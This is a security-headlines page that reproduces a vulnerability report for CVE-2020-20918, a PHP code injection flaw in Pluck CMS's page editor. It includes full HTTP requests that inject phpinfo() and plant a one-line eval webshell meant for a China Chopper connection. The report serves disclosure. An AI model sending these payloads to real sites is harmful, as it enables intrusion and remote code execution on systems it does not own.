Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-20918: Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page · Issue #80 · pluck-cms/pluck

An issue discovered in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary php code via the hidden parameter to admin.php when editing a page.

CVE
Open in Source
#vulnerability#web#windows#php#firefox

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page

Vulnerability location:
data\inc\functions.admin.php 531-535 line

Saves the hidden parameter passed by the POST request to php, but does not escape the special character (') in the value, which can directly close the php syntax remote execution command, such as phpinfo(), eval(), etc.

Demo:
After the installation is successful, go to the management background.Create a new page, enter a title and content Select "Show webpage",submit the request and then grab the request packet to modify the value of the hidden parameter to “no"; phpinfo();’”

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords=&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

http://192.168.80.1/pluck-4.7.10-dev2/?file=aaaa

Write a sentence Trojan

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

title=bbbb&seo_name=&content=%3Cp%3Ebbbb%3C%2Fp%3E&description=&keywords=&hidden=no';@eval($_POST[b]);'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

Use chopper connection

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE